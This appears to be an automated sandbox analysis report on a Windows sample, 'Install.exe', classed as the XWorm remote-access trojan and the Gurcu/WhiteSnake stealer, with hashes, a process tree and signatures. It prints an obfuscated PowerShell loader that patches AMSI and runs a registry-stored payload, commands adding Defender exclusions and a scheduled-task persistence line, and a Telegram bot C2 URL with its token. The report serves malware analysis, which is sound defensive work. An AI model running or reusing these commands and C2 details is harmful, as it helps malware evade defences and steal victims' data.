Analysis

  • max time kernel
    990s
  • max time network
    444s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-12-2024 11:59

General

  • Target

    Install.exe

  • Size

    259KB

  • MD5

    28db4677dcbbaa0a4c5adbc02c9da4f3

  • SHA1

    e1f0199ed131a90e25204399e4e876da64ea3ba5

  • SHA256

    b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c

  • SHA512

    718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52

  • SSDEEP

    6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    ntoskrnl.exe

  • pastebin_url

    https://pastebin.com/raw/Zx6DUkf9

  • telegram

    https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434

Signatures

  • Detect Xworm Payload 3 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 17 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{29ea5ee3-5933-44cc-ae3a-243176ab51b9}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4992
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Drops file in System32 directory
        PID:680
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:408
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1028
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1052
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1096
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1248
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2960
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dUFoGXpMKWgg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KalhFafOcBVjHU,[Parameter(Position=1)][Type]$pzyDQrfWqz)$sIooZKTRqvc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+[Char](101)+'dDel'+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'S'+'e'+[Char](97)+''+[Char](108)+'ed,'+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$sIooZKTRqvc.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+'i'+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'H'+'i'+''+'d'+'e'+'B'+'ySi'+'g'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KalhFafOcBVjHU).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$sIooZKTRqvc.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+'de'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pzyDQrfWqz,$KalhFafOcBVjHU).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $sIooZKTRqvc.CreateType();}$sKDhmNBjbzlVO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+'e'+'N'+''+'a'+''+'t'+''+'i'+'v'+'e'+''+[Char](77)+'e'+'t'+''+'h'+''+[Char](111)+''+[Char](100)+'s');$isPSZOsfDrYNlz=$sKDhmNBjbzlVO.GetMethod('G'+'e'+''+[Char](116)+'Pr'+[Char](111)+'c'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$owPnTDyoSHLmhOgjRZC=dUFoGXpMKWgg @([String])([IntPtr]);$ggKPTxMgDAYcFsKtkccINS=dUFoGXpMKWgg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SEbheHSQugL=$sKDhmNBjbzlVO.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+'d'+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vzMFMandytiSFI=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$SEbheHSQugL,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$AmtqvpvviSMvkhPZt=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$SEbheHSQugL,[Object]('Vi'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+''+'P'+'ro'+'t'+''+'e'+'c'+[Char](116)+'')));$miFdSNV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzMFMandytiSFI,$owPnTDyoSHLmhOgjRZC).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$FAYpSjqCkKuFlBwkv=$isPSZOsfDrYNlz.Invoke($Null,@([Object]$miFdSNV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+'Bu'+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$EsDOexMArT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AmtqvpvviSMvkhPZt,$ggKPTxMgDAYcFsKtkccINS).Invoke($FAYpSjqCkKuFlBwkv,[uint32]8,4,[ref]$EsDOexMArT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FAYpSjqCkKuFlBwkv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AmtqvpvviSMvkhPZt,$ggKPTxMgDAYcFsKtkccINS).Invoke($FAYpSjqCkKuFlBwkv,[uint32]8,0x20,[ref]$EsDOexMArT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3744
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:2068
                      • C:\ProgramData\ntoskrnl.exe
                        C:\ProgramData\ntoskrnl.exe
                        2⤵
                        • Executes dropped EXE
                        PID:676
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Indicator Removal: Clear Windows Event Logs
                      PID:1272
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                      1⤵
                        PID:1300
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1408
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1424
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1456
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1520
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2584
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1576
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1676
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1728
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1748
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1816
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1824
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1928
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1940
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:2024
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2040
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2116
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2232
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2264
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2324
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2536
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2544
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2648
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2804
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Enumerates connected drives
                                                                  PID:2824
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2872
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                    1⤵
                                                                      PID:2888
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2896
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2908
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3156
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3424
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3572
                                                                              • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1288
                                                                                • C:\ProgramData\Install.exe
                                                                                  "C:\ProgramData\Install.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:696
                                                                                • C:\ProgramData\KrnlSetupSus.exe
                                                                                  "C:\ProgramData\KrnlSetupSus.exe"
                                                                                  3⤵
                                                                                  • Checks computer location settings
                                                                                  • Drops startup file
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1396
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4356
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      5⤵
                                                                                        PID:4024
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetupSus.exe'
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1156
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:4764
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:3352
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:5008
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:4552
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:2156
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:856
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:2424
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                                                                              4⤵
                                                                                                PID:2156
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3042.tmp.bat""
                                                                                                4⤵
                                                                                                  PID:972
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:3852
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout 3
                                                                                                      5⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:1068
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3688
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3880
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4040
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                    PID:4120
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:3232
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:4448
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3004
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1552
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2840
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:5060
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:1468
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:1040
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                              1⤵
                                                                                                                PID:1692
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:5032
                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                  1⤵
                                                                                                                    PID:3328
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4984
                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe 7236416439c5a9beb745f68b1b2f7188 74SyLuGg+E29IJf+xVLeUg.0.1.0.0.0
                                                                                                                    1⤵
                                                                                                                    • Sets service image path in registry
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:4488
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      2⤵
                                                                                                                        PID:1684
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      PID:2408
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:3640
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:1976
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:2068
                                                                                                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:2684
                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:3948

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\ProgramData\Install.exe

                                                                                                                            Filesize

                                                                                                                            162KB

                                                                                                                            MD5

                                                                                                                            b5f6c9ac3389f5e61b4c750cf950e27c

                                                                                                                            SHA1

                                                                                                                            dbe0cca47ab36938ed022311f97736fc2915ff06

                                                                                                                            SHA256

                                                                                                                            bd4062e261a7ac5893e95a88d79564b44aad58ca446c3649a50589415b64d098

                                                                                                                            SHA512

                                                                                                                            014f187b94012f0a5077908107a7b0f3c7efae9edf1a6ea7c395e387830e2fe84105a12ea8446311e0fc25fbe2790f56b614c9726507a22fee7baa46b2c4487c

                                                                                                                          • C:\ProgramData\KrnlSetupSus.exe

                                                                                                                            Filesize

                                                                                                                            85KB

                                                                                                                            MD5

                                                                                                                            6435792d63be630506eb9eebbd1e3878

